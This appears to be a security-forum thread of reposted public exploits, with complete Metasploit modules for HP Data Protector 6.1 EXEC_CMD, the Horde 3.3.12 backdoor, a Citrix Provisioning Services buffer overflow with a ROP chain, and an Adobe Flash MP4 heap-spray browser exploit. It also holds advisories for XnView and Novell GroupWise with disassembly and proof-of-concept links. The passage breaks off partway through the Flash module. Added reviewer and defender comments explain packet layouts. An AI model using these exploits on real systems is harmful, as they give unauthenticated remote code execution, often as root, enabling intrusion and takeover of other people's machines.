Posts posted by The_Arhitect

  1. HP Data Protector 6.1 EXEC_CMD Remote Code Execution

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    require 'msf/core'
    # Metasploit module for CVE-2011-0923: HP Data Protector 6.1 EXEC_CMD.
    # A single request is sent to the service (default TCP port 5555) whose
    # program-path field traverses back to /bin/sh and carries the encoded
    # command payload; per the Description the command then runs as root.
    #
    # Defender notes, all visible in the packet assembled by #exploit: the
    # request carries the literal strings "SYSTEM" and "NTAUTHORITY" and a run
    # of "../" sequences in cleartext, which makes it straightforward to match
    # on the wire.
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      # Registers the module metadata and the RPORT option (default 5555).
      #
      # @param info [Hash] module info, merged through update_info
      def initialize(info = {})
        super(update_info(info,
          'Name' => 'HP Data Protector 6.1 EXEC_CMD Remote Code Execution',
          'Description' => %q{
    This exploit abuses a vulnerability in the HP Data Protector service. This
    flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD
    command and traverse back to /bin/sh, this allows arbitrary remote code
    execution under the context of root.
    },
          'Author' =>
            [
              'ch0ks', # poc
              'c4an', # msf poc
              'wireghoul' # Improved msf
            ],
          'References' =>
            [
              [ 'CVE', '2011-0923'],
              [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
              [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
              [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux']
            ],
          'DisclosureDate' => 'Feb 7 2011',
          'Platform' => [ 'unix','linux'],
          'Arch' => ARCH_CMD,
          'Payload' =>
            {
              'Space' => 10000,
              'DisableNops' => true,
              'Compat' => { 'PayloadType' => 'cmd' }
            },
          'Targets' =>
            [
              [ 'HP Data Protector 6.10/6.11 on Linux', {}]
            ],
          'DefaultTarget' => 0
        ))
        register_options([Opt::RPORT(5555),], self.class)
      end

      # Builds the EXEC_CMD request, sends it and runs the payload handler.
      #
      # Packet layout as assembled below: a fixed header, two copies of a
      # random 4-letter username, fixed separators and the literals "SYSTEM",
      # "c4an", "Poc" and "NTAUTHORITY" (the \x63\x34\x61\x6e and \x50\x6f\x63
      # escapes spell "c4an" and "Poc"), then a "../" traversal prefix. The
      # second half ("shell") is "bin/sh", 48 NUL bytes, the encoded command
      # payload and a trailing newline. Errors raised while connecting or
      # sending are rescued (StandardError) and reported; the socket is always
      # closed in ensure.
      #
      # @return [void]
      def exploit
        user = rand_text_alpha(4)
        packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
        packet << user*2
        packet << "\x00\x20\x30\x00\x20"
        packet << "SYSTEM"
        packet << "\x00\x20\x63\x34\x61\x6e"
        packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
        packet << user
        packet << "\x20\x20\x20\x20\x00\x20"
        packet << "\x50\x6f\x63"
        packet << "\x00\x20"
        packet << "NTAUTHORITY"
        packet << "\x00\x20"
        packet << "NTAUTHORITY"
        packet << "\x00\x20"
        packet << "NTAUTHORITY"
        packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
        packet << "../../../../../../../../../../"
        shell_mio = "bin/sh"
        salto = "\n"
        # NOTE(review): encode with no arguments only returns a copy (or
        # transcodes to Encoding.default_internal); salto could be appended as is.
        s = salto.encode
        # shell and shell_mio refer to the same String object; << mutates both.
        shell = shell_mio
        shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        shell << payload.encoded
        shell << s
        sploit = packet + shell
        begin
          # NOTE(review): typo "commmand" in the log string (runtime text, left as is).
          print_status("Sending our commmand...")
          connect
          sock.put(sploit)
          print_status("Waiting ...")
          handler
          # Read command output from socket if cmd/unix/generic payload was used
          if (datastore['CMD'])
            res = sock.get
            # NOTE(review): assumes sock.get returns a String; a nil return
            # would raise on .empty? and be swallowed by the rescue below.
            print_status(res.to_s) if not res.empty?
          end
        rescue
          # Bare rescue catches StandardError only; the error itself is not logged.
          print_error("Error in connection or socket")
        ensure
          disconnect
        end
      end
    end

    Sursa: HP Data Protector 6.1 EXEC_CMD Remote Code Execution

  2. Horde 3.3.12 Backdoor Arbitrary PHP Code Execution

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    require 'msf/core'
    # Metasploit module for CVE-2012-0209: the backdoor that shipped in the
    # Horde 3.3.12 / Horde Groupware 1.2.10 releases. The module POSTs to
    # services/javascript.php with a Cookie header of the form
    # href=passthru:<command> (presumably the backdoor's trigger) and locates the
    # command output in the response body between two copies of a random marker.
    #
    # Defender note: the only endpoint touched is <URI>/services/javascript.php,
    # and the request is recognisable by an "href=" cookie whose value contains
    # a PHP function name followed by a colon.
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      # Registers the module metadata and the URI / APP options.
      #
      # @param info [Hash] module info, merged through update_info
      def initialize(info = {})
        super(update_info(info,
          'Name' => 'Horde 3.3.12 Backdoor Arbitrary PHP Code Execution',
          'Description' => %q{
    This module exploits an arbitrary PHP code execution vulnerability introduced
    as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.
    },
          'Author' => [
            'Eric Romang', # first public PoC
            'jduck' # Metasploit module
          ],
          'License' => MSF_LICENSE,
          'References' =>
            [
              [ 'CVE', '2012-0209'],
              [ 'URL', 'http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155' ],
              [ 'URL', 'http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/' ]
            ],
          'Privileged' => false,
          'Payload' =>
            {
              # CR/LF are excluded because the payload is carried in a header.
              'BadChars' => "\x0a\x0d",
              'DisableNops' => true,
              'Space' => 4096,
              'Compat' =>
                {
                  'PayloadType' => 'cmd',
                }
            },
          'Platform' => [ 'unix', 'linux' ],
          'Arch' => ARCH_CMD,
          'DefaultTarget' => 0,
          'Targets' => [[ 'Automatic', { }]],
          'DisclosureDate' => 'Feb 13 2012'
        ))
        register_options(
          [
            OptString.new('URI', [true, "Path to Horde installation", "/horde"]),
            OptString.new('APP', [true, "App parameter required by javascript.php (must be active)", "horde"]),
          ], self.class)
      end

      # Sends the trigger request and prints whatever the command echoed back.
      #
      # The URI option is normalised to start with "/" and not end with one.
      # The command is wrapped as `echo <key>\`<cmd>\`<key>`, so splitting the
      # response body on key isolates the command output as resp[1].
      #
      # @return [void]
      def exploit
        # Make sure the URI begins with a slash
        uri = datastore['URI']
        if uri[0,1] != '/'
          uri = '/' + uri
        end
        # Make sure the URI ends without a slash, because it's already part of the URI
        if uri[-1, 1] == '/'
          uri = uri[0, uri.length-1]
        end
        function = "passthru"
        key = Rex::Text.rand_text_alpha(6)
        # payload.raw (not .encoded) is used here; it is placed between the markers.
        arguments = "echo #{key}`"+payload.raw+"`#{key}"
        res = send_request_cgi({
          'uri' => uri + "/services/javascript.php",
          'method' => 'POST',
          'ctype' => 'application/x-www-form-urlencoded',
          'data' => "app="+datastore['APP']+"&file=open_calendar.js",
          'headers' =>
            {
              'Cookie' => "href="+function+":"+arguments,
              'Connection' => 'Close',
            }
        }) #default timeout, we don't care about the response
        if (res)
          print_status("The server returned: #{res.code} #{res.message}")
        end
        # NOTE(review): res can evidently be nil (hence the guard above), but the
        # guard only logs; res.body then raises NoMethodError here instead of
        # reaching the "No response found" branch below.
        resp = res.body.split(key)
        # String#split always returns an Array, so only the resp[1] test matters.
        if resp and resp[1]
          print_status(resp[1])
        else
          print_error("No response found")
        end
        handler
      end
    end

    Sursa: Horde 3.3.12 Backdoor Arbitrary PHP Code Execution

  3. XnView <= 1.98.5 Multiple Vulnerabilities

    #######################################################################
    Luigi Auriemma
    Application: XnView
    http://www.xnview.com
    Versions: <= 1.98.5
    Platforms: Windows
    Bugs: A] integer overflow in width/height calculation
    B] jpeg heap overflow
    C] ICO heap overflow
    D] PCX heap overflow
    E] FLI heap overflow
    Exploitation: via file
    Date: 16 Feb 2012
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: aluigi.org
    #######################################################################
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    #######################################################################
    ===============
    1) Introduction
    ===============
    "XnView is an efficient multimedia viewer, browser and converter
    supporting more than 400 graphics formats"
    #######################################################################
    =======
    2) Bugs
    =======
    Note that this program has been tested only in a quick blind
    experiment of a few minutes, so this advisory is not very complete or
    detailed.
    -----------------------------------------------
    A] integer overflow in width/height calculation
    -----------------------------------------------
    The function that handles the width/height of the screen used for any
    file format is affected by some integer overflow vulnerabilities:
    0047DB20 /$ 83EC 18 SUB ESP,18
    ...
    0047DB78 |> 8B4424 38 MOV EAX,DWORD PTR SS:[ESP+38]
    0047DB7C |. 8B4C24 3C MOV ECX,DWORD PTR SS:[ESP+3C]
    0047DB80 |. 8B6C24 34 MOV EBP,DWORD PTR SS:[ESP+34]
    0047DB84 |. 8947 08 MOV DWORD PTR DS:[EDI+8],EAX
    0047DB87 |. 894F 0C MOV DWORD PTR DS:[EDI+C],ECX
    0047DB8A |. 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
    0047DB8D |. 8957 10 MOV DWORD PTR DS:[EDI+10],EDX
    0047DB90 |. 8B4D 04 MOV ECX,DWORD PTR SS:[EBP+4]
    0047DB93 |. 8D1485 00000000 LEA EDX,DWORD PTR DS:[EAX*4] ; integer overflow
    0047DB9A |. 894F 14 MOV DWORD PTR DS:[EDI+14],ECX
    0047DB9D |. 52 PUSH EDX
    0047DB9E |. E8 B8311400 CALL xnview.005C0D5B ; malloc
    0047DBA3 |. 8907 MOV DWORD PTR DS:[EDI],EAX
    0047DBA5 |. 8B47 0C MOV EAX,DWORD PTR DS:[EDI+C]
    0047DBA8 |. C1E0 02 SHL EAX,2 ; integer overflow
    0047DBAB |. 50 PUSH EAX
    0047DBAC |. E8 AA311400 CALL xnview.005C0D5B ; malloc
    0047DBB1 |. 8B4F 08 MOV ECX,DWORD PTR DS:[EDI+8]
    0047DBB4 |. 8947 04 MOV DWORD PTR DS:[EDI+4],EAX
    0047DBB7 |. 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
    0047DBBA |. 83C4 08 ADD ESP,8
    0047DBBD |. 3BC8 CMP ECX,EAX
    0047DBBF |. 75 51 JNZ SHORT xnview.0047DC12
    0047DBC1 |. 8B57 0C MOV EDX,DWORD PTR DS:[EDI+C]
    0047DBC4 |. 8B45 04 MOV EAX,DWORD PTR SS:[EBP+4]
    0047DBC7 |. 3BD0 CMP EDX,EAX
    0047DBC9 |. 75 47 JNZ SHORT xnview.0047DC12
    0047DBCB |. 33C0 XOR EAX,EAX
    0047DBCD |. 3BCE CMP ECX,ESI
    0047DBCF |. 7E 16 JLE SHORT xnview.0047DBE7
    0047DBD1 |> 33C9 /XOR ECX,ECX ; write loop
    0047DBD3 |. 8B17 |MOV EDX,DWORD PTR DS:[EDI]
    0047DBD5 |. 66:8B4D 0E |MOV CX,WORD PTR SS:[EBP+E]
    0047DBD9 |. 0FAFC8 |IMUL ECX,EAX
    0047DBDC |. 890C82 |MOV DWORD PTR DS:[EDX+EAX*4],ECX
    0047DBDF |. 8B4F 08 |MOV ECX,DWORD PTR DS:[EDI+8]
    0047DBE2 |. 40 |INC EAX
    0047DBE3 |. 3BC1 |CMP EAX,ECX
    0047DBE5 |.^7C EA \JL SHORT xnview.0047DBD1
    0047DBE7 |> 8B4F 0C MOV ECX,DWORD PTR DS:[EDI+C]
    0047DBEA |. 33C0 XOR EAX,EAX
    0047DBEC |. 3BCE CMP ECX,ESI
    0047DBEE |. 0F8E B6000000 JLE xnview.0047DCAA
    0047DBF4 |> 8B4D 08 /MOV ECX,DWORD PTR SS:[EBP+8] ; write loop
    0047DBF7 |. 8B75 28 |MOV ESI,DWORD PTR SS:[EBP+28]
    0047DBFA |. 0FAFC8 |IMUL ECX,EAX
    0047DBFD |. 8B57 04 |MOV EDX,DWORD PTR DS:[EDI+4]
    0047DC00 |. 03CE |ADD ECX,ESI
    0047DC02 |. 890C82 |MOV DWORD PTR DS:[EDX+EAX*4],ECX
    0047DC05 |. 8B4F 0C |MOV ECX,DWORD PTR DS:[EDI+C]
    0047DC08 |. 40 |INC EAX
    0047DC09 |. 3BC1 |CMP EAX,ECX
    0047DC0B |.^7C E7 \JL SHORT xnview.0047DBF4
    0047DC0D |. E9 98000000 JMP xnview.0047DCAA
    The content of the 32-bit value to write depends on the file format, and
    whether execution continues after the exception may depend on the
    system in use (more chances using Windows 7).
    ---------------------
    B] jpeg heap overflow
    ---------------------
    Heap overflow during the handling of the "Samples per Line" in the
    Baseline DCT header:
    006E1E5B > 8B7424 3C MOV ESI,DWORD PTR SS:[ESP+3C]
    006E1E5F . 8B6C24 14 MOV EBP,DWORD PTR SS:[ESP+14]
    006E1E63 > 33DB XOR EBX,EBX
    006E1E65 . 83C1 03 ADD ECX,3
    006E1E68 . 8A1C06 MOV BL,BYTE PTR DS:[ESI+EAX]
    006E1E6B . 8BF3 MOV ESI,EBX
    006E1E6D . 33DB XOR EBX,EBX
    006E1E6F . 8A18 MOV BL,BYTE PTR DS:[EAX]
    006E1E71 . 8BFB MOV EDI,EBX
    006E1E73 . 33DB XOR EBX,EBX
    006E1E75 . 8A1C28 MOV BL,BYTE PTR DS:[EAX+EBP]
    006E1E78 . 8BEB MOV EBP,EBX
    006E1E7A . 8B5C24 18 MOV EBX,DWORD PTR SS:[ESP+18]
    006E1E7E . 8B1CAB MOV EBX,DWORD PTR DS:[EBX+EBP*4]
    006E1E81 . 03DE ADD EBX,ESI
    006E1E83 . 8A1413 MOV DL,BYTE PTR DS:[EBX+EDX]
    006E1E86 . 8851 FD MOV BYTE PTR DS:[ECX-3],DL
    006E1E89 . 8B5424 1C MOV EDX,DWORD PTR SS:[ESP+1C]
    006E1E8D . 8B1CBA MOV EBX,DWORD PTR DS:[EDX+EDI*4]
    006E1E90 . 8B5424 20 MOV EDX,DWORD PTR SS:[ESP+20]
    006E1E94 . 031CAA ADD EBX,DWORD PTR DS:[EDX+EBP*4]
    006E1E97 . 8B5424 24 MOV EDX,DWORD PTR SS:[ESP+24]
    006E1E9B . C1FB 10 SAR EBX,10
    006E1E9E . 03DE ADD EBX,ESI
    006E1EA0 . 8A1C13 MOV BL,BYTE PTR DS:[EBX+EDX]
    006E1EA3 . 8859 FE MOV BYTE PTR DS:[ECX-2],BL
    006E1EA6 . 8B5C24 28 MOV EBX,DWORD PTR SS:[ESP+28]
    006E1EAA . 8B3CBB MOV EDI,DWORD PTR DS:[EBX+EDI*4]
    006E1EAD . 03FE ADD EDI,ESI
    006E1EAF . 8B7424 34 MOV ESI,DWORD PTR SS:[ESP+34]
    006E1EB3 . 40 INC EAX
    006E1EB4 . 4E DEC ESI
    006E1EB5 . 8A1C17 MOV BL,BYTE PTR DS:[EDI+EDX]
    006E1EB8 . 897424 34 MOV DWORD PTR SS:[ESP+34],ESI
    006E1EBC . 8859 FF MOV BYTE PTR DS:[ECX-1],BL
    006E1EBF .^75 9A JNZ SHORT xnview.006E1E5B
    --------------------
    C] ICO heap overflow
    --------------------
    Heap overflow during the handling of an ICO file with a smaller number
    of bits per pixel than specified in the main header.
    --------------------
    D] PCX heap overflow
    --------------------
    Heap overflow in the handling of the PCX files.
    The provided proof-of-concept should result in EIP 0x61616161.
    --------------------
    E] FLI heap overflow
    --------------------
    Heap overflow in the handling of the frames in the FLI files.
    #######################################################################
    ===========
    3) The Code
    ===========
    http://aluigi.org/poc/xnview_1.zip
    http://www.exploit-db.com/sploits/18491.zip
    #######################################################################
    ======
    4) Fix
    ======
    No fix.
    #######################################################################

    Sursa: XnView <= 1.98.5 Multiple Vulnerabilities

  4. Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption

    #######################################################################
    Luigi Auriemma
    Application: Novell GroupWise Messenger
    http://www.novell.com/products/groupwise/
    Versions: <= 2.1.0
    Platforms: Windows, Linux, NetWare
    Bug: write4
    Exploitation: remote, versus server
    Date: 16 Feb 2012 (found 10 May 2011)
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: aluigi.org
    #######################################################################
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    #######################################################################
    ===============
    1) Introduction
    ===============
    Check vendor's homepage and version because this is an old advisory.
    #######################################################################
    ======
    2) Bug
    ======
    nmma.exe is a service running on port 8300.
    The protocol is composed of fields that have particular types, for
    example 10 for strings or 8 for integers, and so on, like any RPC
    protocol.
    Through the "createsearch" command sent from a valid account with a
    type 9 value it is possible to write a 0x00000000 to an arbitrary memory
    location:
    00496E2A |> 8B5D 0C /MOV EBX,DWORD PTR SS:[EBP+C]
    00496E2D |> 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8]
    00496E30 |. 8A47 06 |MOV AL,BYTE PTR DS:[EDI+6]
    00496E33 |. 81E1 FFFF0000 |AND ECX,0FFFF
    00496E39 |. 3C 02 |CMP AL,2
    00496E3B |. 8B5C8B 04 |MOV EBX,DWORD PTR DS:[EBX+ECX*4+4]
    ...
    00496F3A |. C703 00000000 |MOV DWORD PTR DS:[EBX],0 ; EBX is controlled
    00496F40 |. 83C3 04 |ADD EBX,4
    00496F43 |. 53 |PUSH EBX
    00496F44 |. 6A 20 |PUSH 20
    00496F46 |. E8 5541F9FF |CALL nmma.0042B0A0
    It seems that this vulnerability can be reached only with a valid account.
    In my PoC I have used a pre-built admin::adminpass account, so remember
    to change the NM_A_PARM1 field if you want to use another one.
    #######################################################################
    ===========
    3) The Code
    ===========
    http://aluigi.org/poc/nmma_x.zip
    http://www.exploit-db.com/sploits/nmma_x.zip
    nmma_x 3 SERVER
    #######################################################################
    ======
    4) Fix
    ======
    No fix.
    #######################################################################

    Sursa: Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption

  5. Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow

    ##
    # $Id: $
    ##
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    require 'msf/core'
    # Metasploit module for the Citrix Provisioning Services 5.6 SP1
    # streamprocess.exe buffer overflow (ZDI-12-009 / BID 49803; fixed by
    # Hotfix CPVS56SP1E043 per the Description). One malformed datagram to
    # UDP/6905 overwrites the saved return address with a stack-pivot gadget
    # (ADD ESP,664; RETN 04) and, per the inline gadget comments, runs a ROP
    # chain that calls VirtualProtect before transferring to the payload.
    #
    # Defender note: the trigger is a single UDP datagram to port 6905 that
    # begins with the bytes 00 00 02 40 (opcode 0x40020000 little-endian) and is
    # roughly 2 KB long; the module reads no response.
    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::Udp

      # Registers the module metadata, the single target and RPORT (default 6905).
      #
      # @param info [Hash] module info, merged through update_info
      def initialize(info = {})
        super(update_info(info,
          'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow',
          'Description' => %q{
    This module exploits a remote buffer overflow in the Citrix Provisioning Services
    5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the
    6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,
    Windows 7, and Windows XP SP3.
    },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'AbdulAziz Hariri', # Initial discovery via ZDI
              'alino <26alino[at]gmail.com>' # Metasploit module
            ],
          # NOTE(review): unexpanded SVN keyword (see also the $Id: $ header above).
          'Version' => '$Revision: $',
          'References' =>
            [
              ['BID', '49803'],
              ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-009'],
              ['URL', 'http://support.citrix.com/article/CTX130846']
            ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'process',
              'InitialAutoRunScript' => 'migrate -f',
            },
          'Payload' =>
            {
              'BadChars' => "\x00",
              # ECX is expected to point at the payload when it is reached (see
              # the 10-byte stub written at offset 494 in #exploit).
              'EncoderOptions' => {'BufferRegister'=>'ECX'},
            },
          'Platform' => ['win'],
          'Targets' =>
            [
              [ 'Citrix Provisioning Services 5.6 SP1',
                {
                  'Offset' => 2012,
                  'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe
                }
              ]
            ],
          'Privileged' => true,
          'DisclosureDate' => 'Nov 04 2011', #CTX130846 creation date
          'DefaultTarget' => 0))
        register_options([Opt::RPORT(6905)], self.class)
      end

      # Builds the datagram and sends it once; no response is read.
      #
      # Layout: 4-byte opcode, 18 random upper-case bytes, a zeroed length
      # field, target['Offset'] (2012) bytes of random filler, then the packed
      # return address (offset 2038). String#[]= is then used to overwrite
      # fixed ranges inside the filler, which are contiguous: the RETN sled at
      # 258..409 (38 * 4 bytes), the gadget chain at 410..493 (21 * 4 bytes),
      # a 10-byte stub at 494..503 and the encoded payload from 504 onwards.
      #
      # NOTE(review): no 'Space' is declared in the Payload hash, so a payload
      # longer than 1534 bytes written at 504 would overlap the return address.
      #
      # @return [void]
      def exploit
        packet = "\x00\x00\x02\x40" # DATA MSG
        packet << rand_text_alpha_upper(18)
        packet << "\x00\x00\x00\x00" # Length
        packet << rand_text_alpha_upper(target['Offset'])
        packet << [target.ret].pack('V')
        rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe
        # Gadget addresses are hard-coded for streamprocess.exe (per the inline
        # comments), so the chain is specific to this build of the binary.
        rop_gadgets =
          [
            0x0045b141, # POP EAX; RETN streamprocess.exe
            0x1009a1bc, # VirtualProtect()
            0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe
            0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe
            0x004ad0cf, # POP EBP; RETN streamprocess.exe
            0x00455d9d, # PUSH ESP; RETN streamprocess.exe
            0x00497f5a, # POP EAX; RETN streamprocess.exe
            0xfffff9d0, # dwSize
            0x00447669, # NEG EAX; RETN streamprocess.exe
            0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe
            0x00426305, # POP ECX; RETN streamprocess.exe
            0x00671fb9, # lpflOldProtect
            0x004e41e6, # POP EDI; RETN streamprocess.exe
            0x0040f004, # RETN streamprocess.exe
            0x00495c05, # POP EAX; RETN streamprocess.exe
            0xffffffc0, # flNewProtect
            0x0042c79a, # NEG EAX; RETN streamprocess.exe
            0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe
            0x0045c1fa, # POP EAX; RETN streamprocess.exe
            0x90909090, # NOP
            0x00435bbe, # PUSHAD; RETN streamprocess.exe
          ].pack("V*")
        # In-place overwrites of the filler region (see method comment).
        packet[258, rop_nop.length] = rop_nop
        packet[410, rop_gadgets.length] = rop_gadgets
        packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff"
        packet[504, payload.encoded.length] = payload.encoded
        print_status("Trying target #{target.name}...")
        connect_udp
        udp_sock.put(packet)
        handler
        disconnect_udp
      end
    end

    Sursa: Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow

  6. Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    require 'msf/core'
    # Metasploit browser-exploit module for CVE-2011-2140 (Adobe Flash Player,
    # Flash10u.ocx, MP4 Sequence Parameter Set handling). It serves an HTML
    # page that heap-sprays via JavaScript and embeds an external SWF media
    # player (SWF_PLAYER_URI) pointed at a crafted MP4 served by the same
    # handler; the crash dump in the =begin/=end block after the class shows
    # ECX/EIP at 0x0c0c0c0c, the spray value used in #on_request_uri.
    #
    # Defender note: the landing page requests an MP4 whose name is random
    # letters under the module's resource path, and the spray script contains
    # the literal "heapLib.ie" constructor call.
    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::HttpServer::HTML

      # Registers the module metadata, the browser targets and the
      # OBFUSCATE / SWF_PLAYER_URI options.
      #
      # @param info [Hash] module info, merged through update_info
      def initialize(info={})
        super(update_info(info,
          'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
          'Description' => %q{
    This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
    component. When processing a MP4 file (specifically the Sequence Parameter Set),
    Flash will see if pic_order_cnt_type is equal to 1, which sets the
    num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
    offset_for_ref_frame on the stack, which allows arbitrary remote code execution
    under the context of the user. Numerous reports also indicate that this
    vulnerability has been exploited in the wild.
    Please note that the exploit requires a SWF media player in order to trigger
    the bug, which currently isn't included in the framework. However, software such
    as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
    },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'Alexander Gavrun', #RCA
              'Abysssec', #PoC
              'sinn3r' #Metasploit
            ],
          'References' =>
            [
              [ 'CVE', '2011-2140' ],
              [ 'BID', '49083' ],
              [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ],
              [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
              [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
              [ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ],
              [ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ]
            ],
          'Payload' =>
            {
              'BadChars' => "\x00",
              'StackAdjustment' => -3500
            },
          'DefaultOptions' =>
            {
              'ExitFunction' => "seh",
              'InitialAutoRunScript' => 'migrate -f'
            },
          'Platform' => 'win',
          # 'Offset' is a String; it is interpolated verbatim into the spray
          # JavaScript in #on_request_uri, not converted to an Integer.
          'Targets' =>
            [
              [ 'Automatic', {} ],
              [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on
              [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
            ],
          'Privileged' => false,
          'DisclosureDate' => "Aug 9 2011",
          'DefaultTarget' => 0))
        register_options(
          [
            OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
            OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
          ], self.class)
      end

      # Picks the target that matches the browser's User-Agent.
      #
      # @param agent [String, nil] User-Agent header value
      # @return [Msf::Module::Target, nil] the explicitly configured target when
      #   it is not 'Automatic'; otherwise targets[1] for "NT 5.1" + "MSIE 6",
      #   targets[2] for "MSIE 7", or nil when the browser is not supported
      def get_target(agent)
        # If a target is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'
        if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
          return targets[1]
        elsif agent =~ /MSIE 7/
          return targets[2]
        else
          return nil
        end
      end

      # HTTP request handler: returns 404 for unsupported browsers, serves the
      # crafted MP4 (@mp4, built in #exploit) for URIs ending in .mp4, and the
      # spray + SWF-embed page for everything else.
      #
      # @param cli [Rex::Socket] client connection
      # @param request [Rex::Proto::Http::Request] incoming request
      # @return [void]
      def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
        my_target = get_target(agent)
        # Avoid the attack if the victim doesn't have the same setup we're targeting
        if my_target.nil?
          print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
          send_not_found(cli)
          return
        end
        # The SWF requests our MP4 trigger
        if request.uri =~ /\.mp4$/
          print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
          #print_error("Sorry, not sending you the mp4 for now")
          #send_not_found(cli)
          send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
          return
        end
        # Set payload depending on target
        # NOTE(review): endianness is taken from the configured `target`, not
        # from `my_target`; in Automatic mode that is targets[0].
        p = payload.encoded
        js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
        # 0x0c bytes: the spray value the crash dump below shows in ECX/EIP.
        js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
        # Heap spray: each block is my_target['Offset'] nop chars, the shellcode
        # and nop padding up to 0x800, doubled to 0x40000 and trimmed to
        # (0x80000-6)/2; 0x2ff such blocks are allocated via heapLib.
        js = <<-JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
    heap_obj.alloc(block);
    }
    JS
        # Prepend the framework's heapLib helper that the script references.
        js = heaplib(js, {:noobfu => true})
        if datastore['OBFUSCATE']
          js = ::Rex::Exploitation::JSObfu.new(js)
          js.obfuscate
        end
        # When bound to all interfaces, use the local address that would be
        # chosen to reach an arbitrary external IP so the MP4 URI is reachable.
